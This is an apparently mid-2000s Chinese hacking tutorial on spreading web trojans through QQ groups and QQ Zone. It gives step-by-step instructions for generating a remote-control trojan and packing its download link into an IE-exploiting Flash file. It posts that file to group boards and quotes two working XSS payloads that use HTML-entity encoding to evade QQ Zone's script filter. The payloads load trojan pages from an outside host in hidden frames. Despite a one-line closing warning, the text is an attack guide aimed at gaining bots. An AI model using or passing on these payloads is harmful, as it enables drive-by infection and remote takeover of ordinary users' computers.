QQ掛馬方法揭密

有無數上網用戶每天都在使用QQ，大家往往注重於QQ尾巴病毒、QQ傳木馬之類的攻擊方式，卻很少有人注意到我們經常訪問的QQ羣、QQ空間裏面隱藏着更大的安全危險，遠比QQ尾巴病毒、QQ傳木馬之類的隱蔽得多，危害更加大。今天我們就來看看攻擊者是如何在QQ羣和QQ空間中掛上網頁木馬，攻擊瀏覽用戶的！

一、QQ羣中簡簡單單掛木馬

在一個比較火的QQ羣裏掛上網頁木馬，一定很容易得到許多肉雞的。怎麼在QQ羣裏掛馬，是在羣裏面羣發木馬的網址嗎?現在已經不會有人上這樣的當了。我們要作的只是在羣裏面發一個作了手腳的帖子。

步驟一：製作網頁木馬

在攻擊前，我們首先要製作好一個木馬網頁。這裏筆者使用了“上興遠程控制木馬V2006”，這個木馬功能非常強，以前筆者曾作過介紹。用上興生成木馬服務端程序“muma.exe”後，將服務端上傳到某個網站上去，假設地址爲“http://www.binghewu.com.cn/muma.exe”。

打開“南域劍盟網頁木馬生成器”，在中間的“URL”處填入木馬的鏈接地址，點擊“生成”按鈕，將會在生成器當前目錄下生成一個名爲“script.txt”的文件(如圖1)。用記事本打開剛纔生成的“script.txt”文件，可以看到木馬代碼，代碼是經過加密的，一般人很難看出這是網頁木馬代碼來(如圖2)。複製所有代碼，然後將代碼插入到任意一個正常的網頁中，就可以得到一個網頁木馬了。

小提示:將木馬代碼插入正常的網頁中，其位置一般是位於“”標記中間。

498)this.style.width=498;" border=1>

圖1 用木馬生成器生成木馬代碼

498)this.style.width=498;" border=1>

圖2 加密的木馬代碼

　　步驟二：製作SWF木馬

在以前的QQ羣中，本來只需要發一張帶圖片的帖子就可以實現掛馬的目的。不過現在QQ羣也改版了，掛馬就需要多一個步驟了，我們還需要將網頁木馬嵌入Flash文件中。

打開“SWF插馬工具(Icode To SWF)”，在“SWF文件”中瀏覽選擇本機上的某個正常的Flash文件;在“插入代碼”中填寫剛纔與在的網頁木馬的鏈接地址(如圖3)。然後點擊“給我插”按鈕，即可將網頁木馬鏈接插入到正常的Flash文件中了。SWF插馬工具生成的Flash文件是利用了一個IE漏洞，對方打開Flash文件後，就會造成IE溢出，自動訪問木馬網頁在後臺下載運行木馬程序。

498)this.style.width=498;">

圖3 生成SWF木馬

步驟三：在QQ羣中掛馬

首先將剛纔生成的SWF木馬文件上傳到某個空間中，然後打開某個QQ羣的BBS欄目，點擊“發表新文章”。在新文章書寫頁面中點擊“插入Flash”按鈕，輸入SWF木馬文件的網絡鏈接地址及長寬，然後點擊後面的小鉤按鈕，插入Flash文件(如圖4)。發表新文章後，當有人在QQ羣中打開查看這篇文章時，就會自動播放Flash並在後臺下載運行上興木馬服務端了。

圖4 在QQ羣中發佈Flash木馬

　　小提示：當然我們也可以直接在QQ羣中散佈SWF木馬文件的網址，別人點擊後一樣會中木馬，不過這種方式不如發佈文章隱蔽和效果好，攻擊的持續性也不強。

　　二、QQ空間玩掛馬

自從騰訊推出QQ空間(QQ-zone)後，各種跨站漏洞便不斷暴出。雖然騰訊已經對QQ-zone進行了一次全面的更新，禁止了運行自定義腳本，不過通過我們的測試，發現所做的限制是很簡單的，只需要轉換一下字符就可以突破限制，在QQ空間上任意掛馬。

　　方法一：掛Flash木馬

打開QQ空間後，在頁面中點擊“自定義”按鈕，在彈出的工具條上依次單擊“個性設置”→“新建模塊”命令，也可在QQ空間頁面中直接按下+組合鍵，打開自定義對話框。在彈出的網頁對話框中輸入任意“模塊名稱”，點擊“提交”按鈕，彈出創建成功的提示框。然後出現“添加內容”對話框，將其中的“網址”、“圖片”中自帶的“http://”刪除，保持“鏈接名稱”爲空白。在“評論”中輸入如下代碼(如圖5)：

　　以下是引用片段：
“<img src="javascri&amp;#112;t:document.getElementById('Mlogo').&#105;nnerHTML+='<div style='position:absolute;top:0;left:0;'&gt;<EMBED src='http://www.binghewu.com.cn/muma.swf' quality=high wmode='transparent' WIdtH='925' HEIGHT='655' TYPE='application/x-shockwave-flash'></div>';"> ”

　　代碼中的Flash地址“http://www.binghewu.com.cn/muma.swf”，是剛纔製作上傳的SWF木馬鏈接地址，可以更改爲其它任意Flash木馬文件地址。提交代碼後，用戶進入此QQ空間時，會自動打開顯示上傳的SWF木馬Flash，從而在後臺下載運行上興木馬服務端程序。

圖5 通過自定義模塊添加SWF木馬

　　小提示：QQ空間是通過檢測用戶提交的代碼中，是否含用“javascript”之類的字符進行過濾的。在上面的代碼中，將腳本部分代碼用ASCII編碼之後替換躲過了過濾，如“javascript”可以替換爲“javascrip”，“p”爲“p”的ASCII編碼。具體ASCII編碼轉換可到“http://www.killadm.ful.cn/ascii.asp”查詢(如圖6)。

圖6 通過網頁轉換字符ASCII碼

　　方法二：掛網頁木馬

上面的方法是直接在QQ空間中掛上一個Flash木馬文件，實現的方法雖然比較簡單，不過這個Flash文件有可能會讓別人起疑心。既然我們可以在QQ空間中寫入自定義代碼，何不乾脆直接掛上網頁木馬呢?

用上面同樣的方法新建一個模塊，代碼如下：

　　以下是引用片段：
“<div id=DI><img src="javascri&#112;t:DI.&#105;nnerHTML='<&#105;frame src="http://www.binghewu.com.cn/muma.htm" width=190 height=190 marginwidth=0 marginheight=0 hspace=0 vspace=0 frameborder=0 scrolling=no></&#105;frame>'" style=display:none></div>”

　　同樣的，在上面的代碼中已經作了ASCII碼轉換躲過過濾;“http://www.binghewu.com.cn/muma.htm”是網頁木馬的鏈接地址，可以換成其它木馬網頁地址。代碼中的其它語句是用來定義模塊大小的，由於設置爲0，該模塊將在QQ空間中被隱藏，但是並不影響木馬網頁的打開與運行。這裏爲了說明攻擊效果，筆者對代碼作了一些修改，將木馬網頁顯示爲新浪首頁，說明完全可以在QQ空間中打開其它木馬網頁的(如圖7)。

圖7 在QQ空間中掛上的新浪頁面

怎麼樣，在QQ羣和QQ空間中掛馬是不是很簡單？希望大家在上網的時候注意一下了。